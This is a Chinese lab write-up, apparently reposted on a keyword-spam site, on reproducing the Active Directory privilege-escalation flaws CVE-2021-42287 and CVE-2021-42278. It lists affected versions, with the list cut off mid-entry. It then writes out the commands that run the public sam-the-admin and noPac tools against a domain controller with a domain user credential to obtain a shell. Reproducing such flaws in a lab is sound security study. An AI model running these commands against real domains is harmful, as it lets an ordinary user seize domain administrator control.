当前位置: 首页 > wzjs >正文

晋中建设局查合同网站关键词seo服务

wzjs 2025/8/10 0:57:30
晋中建设局查合同网站,关键词seo服务,dede 汽车网站模板,做外贸家纺资料网站WindowsAD 域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278) 1.漏洞描述 Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安…

WindowsAD 域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)

1.漏洞描述
       Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用该漏洞造成将域内的普通用户权限提升到域管理员权限等危害。

2.影响版本
CVE-2021-42287:
Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

CVE-2021-42278:
Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows Server, version 20H2 (Server Core Installation)

Windows Server, version 2004 (Server Core installation)

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core

3.漏洞利用条件
(1)一个普通域成员帐户

(2)域用户有创建机器用户的权限(一般默认权限)

(3)DC未打补丁KB5008380或KB5008602

4.环境准备
Win7

192.168.42.128

域普通用户:adtest/szg:1234qweR

Win server2008 R2 Standard Service Pack 1

192.168.42.136

域控机器

Kali

192.168.42.138

攻击机器

5.漏洞利用工具
下载地址:

https://github.com/WazeHell/sam-the-admin

https://github.com/Ridter/noPac

6.漏洞复现
sam-the-admin脚本
查看源码,发现脚本实际是实际就是调用两个可执行文件

kali中存在这两个文件的py文件,路径为/usr/local/bin/smbexec.py 和 /usr/local/bin/secretsdump.py

修改代码如下:

安装requirements.txt文件中的python模块

pip3 install -r requirements.txt

执行如下命令进行域服务提权攻击

python3 sam_the_admin.py "adtest/szg:1234qweR" -dc-ip 192.168.42.136 -shell

PS目前脚本只能在kali环境下运行成功。

noPac脚本

先安装requirements.txt文件中的模块

pip3 install -r requirements.txt

Scanner

python3 scanner.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136

GetST

python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136

Auto get shell

python3 noPac.py -use-ldap adtest/szg:1234qweR -dc-ip 192.168.42.136 –shell

7.漏洞参考:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278

http://www.dtcms.com/wzjs/252926.html

相关文章:

  • wordpress登陆新域名seo兼职招聘
  • 网站会对特殊的ip做跳转淘宝数据查询
  • 政府网站制作费用推广公司主要做什么
  • 福州网站建设哪个好河南网站推广
  • 权重高的网站有哪些做网站找哪个公司好
  • 广东购物网站建设报价百度指数搜索榜
  • 网站企业优化廊坊快速优化排名
  • 做网站里面的内容电商网站公司
  • asp.net做登录网站资源2022最新热点事件及点评
  • 乳山建设局网站seo短视频网页入口引流
  • 兼职做诚信网站认证企业网站的功能
  • 省网站建设某网站seo诊断分析和优化方案
  • 网站规划建设心得与体会百度网首页登录入口
  • 做网站等保收费市场调研的四个步骤
  • 有什么平台可以做网站网页制作工具
  • 网站域名icp 备案价格宁波网络推广联系方式
  • 河北廊坊seo网站建设网站优化最新军事动态最新消息
  • 苏州木渎做网站专业网站优化外包
  • 阳朔网站建设公司营销推广与策划
  • 品牌厂家网站建设网站seo方案撰写
  • 做网站运营有趣吗百度关键词下拉有什么软件
  • 自己建一个网站需要什么怎么做产品推广平台
  • 江阴市建设局网站管理通道网站建设服务
  • 中国有什么网站做跨境零售如何注册网站平台
  • 用dw做网站怎么添加水平线个人网站设计成品
  • 如何建立分销网站网络销售公司
  • 自制100种少女心小物品百度关键词如何优化
  • 中山做营销型网站seo一个关键词多少钱
  • 毕业设计网站最容易做什莫类型广东网络优化推广
  • 自助网站免费腾讯广点通